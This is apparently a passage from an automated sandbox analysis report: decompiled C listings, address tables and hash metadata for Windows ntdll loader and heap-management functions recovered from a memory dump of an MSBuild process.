                                            0x0107192c
                                            0x01071931
                                            0x0107193a
                                            0x0107193e
                                            0x01071940
                                            0x01071947
                                            0x01071948
                                            0x01071948
                                            0x0107193e
                                            0x010718e5
                                            0x0107194f
                                            0x01071952
                                            0x01071956
                                            0x0107195d
                                            0x01071961
                                            0x0107196d
                                            0x00000000
                                            0x0107196d
                                            0x0107188a
                                            0x0107188f
                                            0x01071891
                                            0x00000000
                                            0x00000000
                                            0x0107189d
                                            0x00000000
                                            0x0107189d
                                            0x0107184c
                                            0x01071859
                                            0x01071859
                                            0x0107185c
                                            0x00000000
                                            0x00000000
                                            0x01071851
                                            0x01071853
                                            0x01071855
                                            0x01071865
                                            0x01071865
                                            0x01071866
                                            0x01071868
                                            0x01071870
                                            0x00000000
                                            0x01071870
                                            0x01071857
                                            0x01071857
                                            0x0107185e
                                            0x00000000
                                            0x010716d2
                                            0x010716d2
                                            0x010716d5
                                            0x010716d5
                                            0x010716d8
                                            0x010716da
                                            0x010716dd
                                            0x010716e0
                                            0x010716e3
                                            0x010716e5
                                            0x01071808
                                            0x01071808
                                            0x01071809
                                            0x01071812
                                            0x01071817
                                            0x01071817
                                            0x00000000
                                            0x01071817
                                            0x010716eb
                                            0x010716ed
                                            0x00000000
                                            0x00000000
                                            0x010716f6
                                            0x010716f9
                                            0x010716ff
                                            0x01071701
                                            0x0107172c
                                            0x0107172c
                                            0x0107172f
                                            0x01071732
                                            0x01071734
                                            0x01071737
                                            0x0107173b
                                            0x0107175e
                                            0x0107175e
                                            0x01071761
                                            0x01071764
                                            0x0107176d
                                            0x01071774
                                            0x01071777
                                            0x0107177a
                                            0x0107177c
                                            0x0107177f
                                            0x01071781
                                            0x01071781
                                            0x01071784
                                            0x01071784
                                            0x0107177f
                                            0x0107178c
                                            0x01071791
                                            0x01071796
                                            0x01071799
                                            0x0107179c
                                            0x0107179e
                                            0x010717a5
                                            0x010717a9
                                            0x010717c9
                                            0x010717ce
                                            0x010717ab
                                            0x010717c1
                                            0x010717c6
                                            0x010717dc
                                            0x010717e3
                                            0x010717e8
                                            0x010717ee
                                            0x010717f1
                                            0x010717f5
                                            0x010717f7
                                            0x010717fe
                                            0x010717ff
                                            0x010717ff
                                            0x010717f5
                                            0x0107179c
                                            0x00000000
                                            0x01071764
                                            0x01071741
                                            0x01071746
                                            0x01071748
                                            0x00000000
                                            0x00000000
                                            0x01071754
                                            0x00000000
                                            0x01071754
                                            0x01071703
                                            0x01071710
                                            0x01071710
                                            0x01071713
                                            0x00000000
                                            0x00000000
                                            0x01071708
                                            0x0107170a
                                            0x0107170c
                                            0x0107171c
                                            0x0107171c
                                            0x0107171d
                                            0x0107171f
                                            0x01071727
                                            0x00000000
                                            0x01071727
                                            0x0107170e
                                            0x0107170e
                                            0x01071715
                                            0x00000000
                                            0x01071715
                                            0x010716cc
                                            0x01029a45
                                            0x01029a45
                                            0x01029a0e
                                            0x01029a1c
                                            0x01029a23
                                            0x0107167e
                                            0x0107167f
                                            0x01071681
                                            0x01071683
                                            0x01071684
                                            0x00000000
                                            0x01071684
                                            0x00000000
                                            0x01029aad
                                            0x01029aad
                                            0x01029ab0
                                            0x01029ab3
                                            0x01029ab3
                                            0x01029ab6
                                            0x00000000
                                            0x00000000
                                            0x01029ab8
                                            0x01029aba
                                            0x01029abc
                                            0x01029ac8
                                            0x01029ac8
                                            0x00000000
                                            0x01029abe
                                            0x01029abe
                                            0x01029ac0
                                            0x00000000
                                            0x01029ac0
                                            0x01029abc
                                            0x01029ad2
                                            0x00000000
                                            0x01029ad2
                                            0x01029aab

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 93aad1e2aaa0f5d482b1c43bdc2e8b27dc581409c0dd949249b55e291f91bfdc
                                            • Instruction ID: e908414d79f1d766c3818312d1c5a674f7f96bed7a08f99232eea0527865da17
                                            • Opcode Fuzzy Hash: 93aad1e2aaa0f5d482b1c43bdc2e8b27dc581409c0dd949249b55e291f91bfdc
                                            • Instruction Fuzzy Hash: BF22D270A00256DFEB65CF2CC485BBABBF5EF45704F1885A9E8C58B282E735D885CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E01018794(void* __ecx) {
                                            				signed int _v0;
                                            				char _v8;
                                            				signed int _v12;
                                            				void* _v16;
                                            				signed int _v20;
                                            				intOrPtr _v24;
                                            				signed int _v28;
                                            				signed int _v32;
                                            				signed int _v40;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr* _t77;
                                            				signed int _t80;
                                            				signed char _t81;
                                            				signed int _t87;
                                            				signed int _t91;
                                            				void* _t92;
                                            				void* _t94;
                                            				signed int _t95;
                                            				signed int _t103;
                                            				signed int _t105;
                                            				signed int _t110;
                                            				signed int _t118;
                                            				intOrPtr* _t121;
                                            				intOrPtr _t122;
                                            				signed int _t125;
                                            				signed int _t129;
                                            				signed int _t131;
                                            				signed int _t134;
                                            				signed int _t136;
                                            				signed int _t143;
                                            				signed int* _t147;
                                            				signed int _t151;
                                            				void* _t153;
                                            				signed int* _t157;
                                            				signed int _t159;
                                            				signed int _t161;
                                            				signed int _t166;
                                            				signed int _t168;
                                            
                                            				_push(__ecx);
                                            				_t153 = __ecx;
                                            				_t159 = 0;
                                            				_t121 = __ecx + 0x3c;
                                            				if( *_t121 == 0) {
                                            					L2:
                                            					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                            					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                            						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                            						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                            						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                            							L6:
                                            							if(E0101934A() != 0) {
                                            								_t159 = E0108A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                            								__eflags = _t159;
                                            								if(_t159 < 0) {
                                            									_t81 =  *0x10f5780; // 0x0
                                            									__eflags = _t81 & 0x00000003;
                                            									if((_t81 & 0x00000003) != 0) {
                                            										_push(_t159);
                                            										E01085510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                            										_t81 =  *0x10f5780; // 0x0
                                            									}
                                            									__eflags = _t81 & 0x00000010;
                                            									if((_t81 & 0x00000010) != 0) {
                                            										asm("int3");
                                            									}
                                            								}
                                            							}
                                            						} else {
                                            							_t159 = E0101849B(0, _t122, _t153, _t159, _t180);
                                            							if(_t159 >= 0) {
                                            								goto L6;
                                            							}
                                            						}
                                            						_t80 = _t159;
                                            						goto L8;
                                            					} else {
                                            						_t125 = 0x13;
                                            						asm("int 0x29");
                                            						_push(0);
                                            						_push(_t159);
                                            						_t161 = _t125;
                                            						_t87 =  *( *[fs:0x30] + 0x1e8);
                                            						_t143 = 0;
                                            						_v40 = _t161;
                                            						_t118 = 0;
                                            						_push(_t153);
                                            						__eflags = _t87;
                                            						if(_t87 != 0) {
                                            							_t118 = _t87 + 0x5d8;
                                            							__eflags = _t118;
                                            							if(_t118 == 0) {
                                            								L46:
                                            								_t118 = 0;
                                            							} else {
                                            								__eflags =  *(_t118 + 0x30);
                                            								if( *(_t118 + 0x30) == 0) {
                                            									goto L46;
                                            								}
                                            							}
                                            						}
                                            						_v32 = 0;
                                            						_v28 = 0;
                                            						_v16 = 0;
                                            						_v20 = 0;
                                            						_v12 = 0;
                                            						__eflags = _t118;
                                            						if(_t118 != 0) {
                                            							__eflags = _t161;
                                            							if(_t161 != 0) {
                                            								__eflags =  *(_t118 + 8);
                                            								if( *(_t118 + 8) == 0) {
                                            									L22:
                                            									_t143 = 1;
                                            									__eflags = 1;
                                            								} else {
                                            									_t19 = _t118 + 0x40; // 0x40
                                            									_t156 = _t19;
                                            									E01018999(_t19,  &_v16);
                                            									__eflags = _v0;
                                            									if(_v0 != 0) {
                                            										__eflags = _v0 - 1;
                                            										if(_v0 != 1) {
                                            											goto L22;
                                            										} else {
                                            											_t128 =  *(_t161 + 0x64);
                                            											__eflags =  *(_t161 + 0x64);
                                            											if( *(_t161 + 0x64) == 0) {
                                            												goto L22;
                                            											} else {
                                            												E01018999(_t128,  &_v12);
                                            												_t147 = _v12;
                                            												_t91 = 0;
                                            												__eflags = 0;
                                            												_t129 =  *_t147;
                                            												while(1) {
                                            													__eflags =  *((intOrPtr*)(0x10f5c60 + _t91 * 8)) - _t129;
                                            													if( *((intOrPtr*)(0x10f5c60 + _t91 * 8)) == _t129) {
                                            														break;
                                            													}
                                            													_t91 = _t91 + 1;
                                            													__eflags = _t91 - 5;
                                            													if(_t91 < 5) {
                                            														continue;
                                            													} else {
                                            														_t131 = 0;
                                            														__eflags = 0;
                                            													}
                                            													L37:
                                            													__eflags = _t131;
                                            													if(_t131 != 0) {
                                            														goto L22;
                                            													} else {
                                            														__eflags = _v16 - _t147;
                                            														if(_v16 != _t147) {
                                            															goto L22;
                                            														} else {
                                            															E01022280(_t92, 0x10f86cc);
                                            															_t94 = E010D9DFB( &_v20);
                                            															__eflags = _t94 - 1;
                                            															if(_t94 != 1) {
                                            															}
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															 *_t118 =  *_t118 + 1;
                                            															asm("adc dword [ebx+0x4], 0x0");
                                            															_t95 = E010361A0( &_v32);
                                            															__eflags = _t95;
                                            															if(_t95 != 0) {
                                            																__eflags = _v32 | _v28;
                                            																if((_v32 | _v28) != 0) {
                                            																	_t71 = _t118 + 0x40; // 0x3f
                                            																	_t134 = _t71;
                                            																	goto L55;
                                            																}
                                            															}
                                            															goto L30;
                                            														}
                                            													}
                                            													goto L56;
                                            												}
                                            												_t92 = 0x10f5c64 + _t91 * 8;
                                            												asm("lock xadd [eax], ecx");
                                            												_t131 = (_t129 | 0xffffffff) - 1;
                                            												goto L37;
                                            											}
                                            										}
                                            										goto L56;
                                            									} else {
                                            										_t143 = E01018A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                            										__eflags = _t143;
                                            										if(_t143 != 0) {
                                            											_t157 = _v12;
                                            											_t103 = 0;
                                            											__eflags = 0;
                                            											_t136 =  &(_t157[1]);
                                            											 *(_t161 + 0x64) = _t136;
                                            											_t151 =  *_t157;
                                            											_v20 = _t136;
                                            											while(1) {
                                            												__eflags =  *((intOrPtr*)(0x10f5c60 + _t103 * 8)) - _t151;
                                            												if( *((intOrPtr*)(0x10f5c60 + _t103 * 8)) == _t151) {
                                            													break;
                                            												}
                                            												_t103 = _t103 + 1;
                                            												__eflags = _t103 - 5;
                                            												if(_t103 < 5) {
                                            													continue;
                                            												}
                                            												L21:
                                            												_t105 = E0104F380(_t136, 0xfe1184, 0x10);
                                            												__eflags = _t105;
                                            												if(_t105 != 0) {
                                            													__eflags =  *_t157 -  *_v16;
                                            													if( *_t157 >=  *_v16) {
                                            														goto L22;
                                            													} else {
                                            														asm("cdq");
                                            														_t166 = _t157[5] & 0x0000ffff;
                                            														_t108 = _t157[5] & 0x0000ffff;
                                            														asm("cdq");
                                            														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                            														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                            														if(__eflags > 0) {
                                            															L29:
                                            															E01022280(_t108, 0x10f86cc);
                                            															 *_t118 =  *_t118 + 1;
                                            															_t42 = _t118 + 0x40; // 0x3f
                                            															_t156 = _t42;
                                            															asm("adc dword [ebx+0x4], 0x0");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															asm("movsd");
                                            															_t110 = E010361A0( &_v32);
                                            															__eflags = _t110;
                                            															if(_t110 != 0) {
                                            																__eflags = _v32 | _v28;
                                            																if((_v32 | _v28) != 0) {
                                            																	_t134 = _v20;
                                            																	L55:
                                            																	E010D9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                            																}
                                            															}
                                            															L30:
                                            															 *_t118 =  *_t118 + 1;
                                            															asm("adc dword [ebx+0x4], 0x0");
                                            															E0101FFB0(_t118, _t156, 0x10f86cc);
                                            															goto L22;
                                            														} else {
                                            															if(__eflags < 0) {
                                            																goto L22;
                                            															} else {
                                            																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                            																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                            																	goto L22;
                                            																} else {
                                            																	goto L29;
                                            																}
                                            															}
                                            														}
                                            													}
                                            													goto L56;
                                            												}
                                            												goto L22;
                                            											}
                                            											asm("lock inc dword [eax]");
                                            											goto L21;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						return _t143;
                                            					}
                                            				} else {
                                            					_push( &_v8);
                                            					_push( *((intOrPtr*)(__ecx + 0x50)));
                                            					_push(__ecx + 0x40);
                                            					_push(_t121);
                                            					_push(0xffffffff);
                                            					_t80 = E01049A00();
                                            					_t159 = _t80;
                                            					if(_t159 < 0) {
                                            						L8:
                                            						return _t80;
                                            					} else {
                                            						goto L2;
                                            					}
                                            				}
                                            				L56:
                                            			}












































                                            0x01018799
                                            0x0101879d
                                            0x010187a1
                                            0x010187a3
                                            0x010187a8
                                            0x010187c3
                                            0x010187c3
                                            0x010187c8
                                            0x010187d1
                                            0x010187d4
                                            0x010187d8
                                            0x010187e5
                                            0x010187ec
                                            0x01069bfe
                                            0x01069c00
                                            0x01069c02
                                            0x01069c08
                                            0x01069c0d
                                            0x01069c0f
                                            0x01069c14
                                            0x01069c2d
                                            0x01069c32
                                            0x01069c37
                                            0x01069c3a
                                            0x01069c3c
                                            0x01069c42
                                            0x01069c42
                                            0x01069c3c
                                            0x01069c02
                                            0x010187da
                                            0x010187df
                                            0x010187e3
                                            0x00000000
                                            0x00000000
                                            0x010187e3
                                            0x010187f2
                                            0x00000000
                                            0x010187fb
                                            0x010187fd
                                            0x010187fe
                                            0x0101880e
                                            0x0101880f
                                            0x01018810
                                            0x01018814
                                            0x0101881a
                                            0x0101881c
                                            0x0101881f
                                            0x01018821
                                            0x01018822
                                            0x01018824
                                            0x01018826
                                            0x0101882c
                                            0x0101882e
                                            0x01069c48
                                            0x01069c48
                                            0x01018834
                                            0x01018834
                                            0x01018837
                                            0x00000000
                                            0x00000000
                                            0x01018837
                                            0x0101882e
                                            0x0101883d
                                            0x01018840
                                            0x01018843
                                            0x01018846
                                            0x01018849
                                            0x0101884c
                                            0x0101884e
                                            0x01018850
                                            0x01018852
                                            0x01018854
                                            0x01018857
                                            0x010188b4
                                            0x010188b6
                                            0x010188b6
                                            0x01018859
                                            0x01018859
                                            0x01018859
                                            0x01018861
                                            0x01018866
                                            0x0101886a
                                            0x0101893d
                                            0x01018941
                                            0x00000000
                                            0x01018947
                                            0x01018947
                                            0x0101894a
                                            0x0101894c
                                            0x00000000
                                            0x01018952
                                            0x01018955
                                            0x0101895a
                                            0x0101895d
                                            0x0101895d
                                            0x0101895f
                                            0x01018961
                                            0x01018961
                                            0x01018968
                                            0x00000000
                                            0x00000000
                                            0x0101896a
                                            0x0101896b
                                            0x0101896e
                                            0x00000000
                                            0x01018970
                                            0x01018970
                                            0x01018970
                                            0x01018970
                                            0x01018972
                                            0x01018972
                                            0x01018974
                                            0x00000000
                                            0x0101897a
                                            0x0101897a
                                            0x0101897d
                                            0x00000000
                                            0x01018983
                                            0x01069c65
                                            0x01069c6d
                                            0x01069c72
                                            0x01069c75
                                            0x01069c75
                                            0x01069c82
                                            0x01069c86
                                            0x01069c87
                                            0x01069c88
                                            0x01069c89
                                            0x01069c8c
                                            0x01069c90
                                            0x01069c95
                                            0x01069c97
                                            0x01069ca0
                                            0x01069ca3
                                            0x01069ca9
                                            0x01069ca9
                                            0x00000000
                                            0x01069ca9
                                            0x01069ca3
                                            0x00000000
                                            0x01069c97
                                            0x0101897d
                                            0x00000000
                                            0x01018974
                                            0x01018988
                                            0x01018992
                                            0x01018996
                                            0x00000000
                                            0x01018996
                                            0x0101894c
                                            0x00000000
                                            0x01018870
                                            0x0101887b
                                            0x0101887d
                                            0x0101887f
                                            0x01018881
                                            0x01018884
                                            0x01018884
                                            0x01018886
                                            0x01018889
                                            0x0101888c
                                            0x0101888e
                                            0x01018891
                                            0x01018891
                                            0x01018898
                                            0x00000000
                                            0x00000000
                                            0x0101889a
                                            0x0101889b
                                            0x0101889e
                                            0x00000000
                                            0x00000000
                                            0x010188a0
                                            0x010188a8
                                            0x010188b0
                                            0x010188b2
                                            0x010188d3
                                            0x010188d5
                                            0x00000000
                                            0x010188d7
                                            0x010188db
                                            0x010188dc
                                            0x010188e0
                                            0x010188e8
                                            0x010188ee
                                            0x010188f0
                                            0x010188f3
                                            0x010188fc
                                            0x01018901
                                            0x01018906
                                            0x0101890c
                                            0x0101890c
                                            0x0101890f
                                            0x01018916
                                            0x01018917
                                            0x01018918
                                            0x01018919
                                            0x0101891a
                                            0x0101891f
                                            0x01018921
                                            0x01069c52
                                            0x01069c55
                                            0x01069c5b
                                            0x01069cac
                                            0x01069cc0
                                            0x01069cc0
                                            0x01069c55
                                            0x01018927
                                            0x01018927
                                            0x0101892f
                                            0x01018933
                                            0x00000000
                                            0x010188f5
                                            0x010188f5
                                            0x00000000
                                            0x010188f7
                                            0x010188f7
                                            0x010188fa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010188fa
                                            0x010188f5
                                            0x010188f3
                                            0x00000000
                                            0x010188d5
                                            0x00000000
                                            0x010188b2
                                            0x010188c9
                                            0x00000000
                                            0x010188c9
                                            0x0101887f
                                            0x0101886a
                                            0x01018857
                                            0x01018852
                                            0x010188bf
                                            0x010188bf
                                            0x010187aa
                                            0x010187ad
                                            0x010187ae
                                            0x010187b4
                                            0x010187b5
                                            0x010187b6
                                            0x010187b8
                                            0x010187bd
                                            0x010187c1
                                            0x010187f4
                                            0x010187fa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010187c1
                                            0x00000000

                                            Strings
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 01069C28
                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01069C18
                                            • LdrpDoPostSnapWork, xrefs: 01069C1E
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 2994545307-1948996284
                                            • Opcode ID: 85d466b07d855b5d3e1a15ded5e494a52c4f355bc713da385ea3254019ac81bf
                                            • Instruction ID: cce02aa055c6f45f39694338061b68070e7e40545bf47b2c89023ffce10d71f4
                                            • Opcode Fuzzy Hash: 85d466b07d855b5d3e1a15ded5e494a52c4f355bc713da385ea3254019ac81bf
                                            • Instruction Fuzzy Hash: B091F431A0021AAFDF58DF59D881ABA77F5FF44314B1881AADEC5AB548D734EA01CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E0103AC7B(void* __ecx, signed short* __edx) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				void* __ebx;
                                            				signed char _t75;
                                            				signed int _t79;
                                            				signed int _t88;
                                            				intOrPtr _t89;
                                            				signed int _t96;
                                            				signed char* _t97;
                                            				intOrPtr _t98;
                                            				signed int _t101;
                                            				signed char* _t102;
                                            				intOrPtr _t103;
                                            				signed int _t105;
                                            				signed char* _t106;
                                            				signed int _t131;
                                            				signed int _t138;
                                            				void* _t149;
                                            				signed short* _t150;
                                            
                                            				_t150 = __edx;
                                            				_t149 = __ecx;
                                            				_t70 =  *__edx & 0x0000ffff;
                                            				__edx[1] = __edx[1] & 0x000000f8;
                                            				__edx[3] = 0;
                                            				_v8 =  *__edx & 0x0000ffff;
                                            				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
                                            					_t39 =  &(_t150[8]); // 0x8
                                            					E0105D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
                                            					__edx[1] = __edx[1] | 0x00000004;
                                            				}
                                            				_t75 =  *(_t149 + 0xcc) ^  *0x10f8a68;
                                            				if(_t75 != 0) {
                                            					L4:
                                            					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                            						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
                                            						_t79 =  *(_t149 + 0x50);
                                            						 *_t150 =  *_t150 ^ _t79;
                                            						return _t79;
                                            					}
                                            					return _t75;
                                            				} else {
                                            					_t9 =  &(_t150[0x80f]); // 0x1017
                                            					_t138 = _t9 & 0xfffff000;
                                            					_t10 =  &(_t150[0x14]); // 0x20
                                            					_v12 = _t138;
                                            					if(_t138 == _t10) {
                                            						_t138 = _t138 + 0x1000;
                                            						_v12 = _t138;
                                            					}
                                            					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
                                            					if(_t75 > _t138) {
                                            						_v8 = _t75 - _t138;
                                            						_push(0x4000);
                                            						_push( &_v8);
                                            						_push( &_v12);
                                            						_push(0xffffffff);
                                            						_t131 = E010496E0();
                                            						__eflags = _t131 - 0xc0000045;
                                            						if(_t131 == 0xc0000045) {
                                            							_t88 = E010B3C60(_v12, _v8);
                                            							__eflags = _t88;
                                            							if(_t88 != 0) {
                                            								_push(0x4000);
                                            								_push( &_v8);
                                            								_push( &_v12);
                                            								_push(0xffffffff);
                                            								_t131 = E010496E0();
                                            							}
                                            						}
                                            						_t89 =  *[fs:0x30];
                                            						__eflags = _t131;
                                            						if(_t131 < 0) {
                                            							__eflags =  *(_t89 + 0xc);
                                            							if( *(_t89 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E0100B150();
                                            							} else {
                                            								E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							_push(_v8);
                                            							_push(_v12);
                                            							_push(_t149);
                                            							_t75 = E0100B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
                                            							goto L4;
                                            						} else {
                                            							_t96 =  *(_t89 + 0x50);
                                            							_t132 = 0x7ffe0380;
                                            							__eflags = _t96;
                                            							if(_t96 != 0) {
                                            								__eflags =  *_t96;
                                            								if( *_t96 == 0) {
                                            									goto L10;
                                            								}
                                            								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
                                            								L11:
                                            								__eflags =  *_t97;
                                            								if( *_t97 != 0) {
                                            									_t98 =  *[fs:0x30];
                                            									__eflags =  *(_t98 + 0x240) & 0x00000001;
                                            									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
                                            										E010C14FB(_t132, _t149, _v12, _v8, 7);
                                            									}
                                            								}
                                            								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
                                            								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
                                            								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
                                            								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
                                            								_t101 =  *( *[fs:0x30] + 0x50);
                                            								__eflags = _t101;
                                            								if(_t101 != 0) {
                                            									__eflags =  *_t101;
                                            									if( *_t101 == 0) {
                                            										goto L13;
                                            									}
                                            									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
                                            									goto L14;
                                            								} else {
                                            									L13:
                                            									_t102 = _t132;
                                            									L14:
                                            									__eflags =  *_t102;
                                            									if( *_t102 != 0) {
                                            										_t103 =  *[fs:0x30];
                                            										__eflags =  *(_t103 + 0x240) & 0x00000001;
                                            										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
                                            											__eflags = E01027D50();
                                            											if(__eflags != 0) {
                                            												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
                                            												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
                                            											}
                                            											E010C1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
                                            										}
                                            									}
                                            									_t133 = 0x7ffe038a;
                                            									_t105 =  *( *[fs:0x30] + 0x50);
                                            									__eflags = _t105;
                                            									if(_t105 != 0) {
                                            										__eflags =  *_t105;
                                            										if( *_t105 == 0) {
                                            											goto L16;
                                            										}
                                            										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
                                            										goto L17;
                                            									} else {
                                            										L16:
                                            										_t106 = _t133;
                                            										L17:
                                            										__eflags =  *_t106;
                                            										if( *_t106 != 0) {
                                            											__eflags = E01027D50();
                                            											if(__eflags != 0) {
                                            												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
                                            												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
                                            											}
                                            											E010C1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
                                            										}
                                            										_t75 = _t150[1] & 0x00000013 | 0x00000008;
                                            										_t150[1] = _t75;
                                            										goto L4;
                                            									}
                                            								}
                                            							}
                                            							L10:
                                            							_t97 = _t132;
                                            							goto L11;
                                            						}
                                            					} else {
                                            						goto L4;
                                            					}
                                            				}
                                            			}






















                                            0x0103ac85
                                            0x0103ac88
                                            0x0103ac8a
                                            0x0103ac8d
                                            0x0103ac91
                                            0x0103ac99
                                            0x0103ac9c
                                            0x01079f57
                                            0x01079f5b
                                            0x01079f60
                                            0x01079f60
                                            0x0103aca8
                                            0x0103acae
                                            0x0103acda
                                            0x0103acde
                                            0x0103ace8
                                            0x0103aceb
                                            0x0103acee
                                            0x00000000
                                            0x0103acee
                                            0x0103acf6
                                            0x0103acb0
                                            0x0103acb0
                                            0x0103acbb
                                            0x0103acbd
                                            0x0103acc0
                                            0x0103acc5
                                            0x0103adae
                                            0x0103adb4
                                            0x0103adb4
                                            0x0103acd4
                                            0x0103acd8
                                            0x0103acf9
                                            0x0103acff
                                            0x0103ad04
                                            0x0103ad08
                                            0x0103ad09
                                            0x0103ad10
                                            0x0103ad12
                                            0x0103ad18
                                            0x01079f6f
                                            0x01079f74
                                            0x01079f76
                                            0x01079f7c
                                            0x01079f84
                                            0x01079f88
                                            0x01079f89
                                            0x01079f90
                                            0x01079f90
                                            0x01079f76
                                            0x0103ad1e
                                            0x0103ad24
                                            0x0103ad26
                                            0x0107a097
                                            0x0107a09b
                                            0x0107a0ba
                                            0x0107a0bf
                                            0x0107a09d
                                            0x0107a0b2
                                            0x0107a0b7
                                            0x0107a0c5
                                            0x0107a0c8
                                            0x0107a0cb
                                            0x0107a0d2
                                            0x00000000
                                            0x0103ad2c
                                            0x0103ad2c
                                            0x0103ad2f
                                            0x0103ad34
                                            0x0103ad36
                                            0x01079f97
                                            0x01079f9a
                                            0x00000000
                                            0x00000000
                                            0x01079fa9
                                            0x0103ad3e
                                            0x0103ad3e
                                            0x0103ad41
                                            0x01079fb3
                                            0x01079fb9
                                            0x01079fc0
                                            0x01079fd0
                                            0x01079fd0
                                            0x01079fc0
                                            0x0103ad4a
                                            0x0103ad50
                                            0x0103ad5c
                                            0x0103ad62
                                            0x0103ad68
                                            0x0103ad6b
                                            0x0103ad6d
                                            0x01079fda
                                            0x01079fdd
                                            0x00000000
                                            0x00000000
                                            0x01079fec
                                            0x00000000
                                            0x0103ad73
                                            0x0103ad73
                                            0x0103ad73
                                            0x0103ad75
                                            0x0103ad75
                                            0x0103ad78
                                            0x01079ff6
                                            0x01079ffc
                                            0x0107a003
                                            0x0107a00e
                                            0x0107a010
                                            0x0107a01b
                                            0x0107a01b
                                            0x0107a01b
                                            0x0107a038
                                            0x0107a038
                                            0x0107a003
                                            0x0103ad84
                                            0x0103ad89
                                            0x0103ad8c
                                            0x0103ad8e
                                            0x0107a042
                                            0x0107a045
                                            0x00000000
                                            0x00000000
                                            0x0107a054
                                            0x00000000
                                            0x0103ad94
                                            0x0103ad94
                                            0x0103ad94
                                            0x0103ad96
                                            0x0103ad96
                                            0x0103ad99
                                            0x0107a063
                                            0x0107a065
                                            0x0107a070
                                            0x0107a070
                                            0x0107a070
                                            0x0107a08d
                                            0x0107a08d
                                            0x0103ada4
                                            0x0103ada6
                                            0x00000000
                                            0x0103ada6
                                            0x0103ad8e
                                            0x0103ad6d
                                            0x0103ad3c
                                            0x0103ad3c
                                            0x00000000
                                            0x0103ad3c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0103acd8

                                            Strings
                                            • HEAP: , xrefs: 0107A0BA
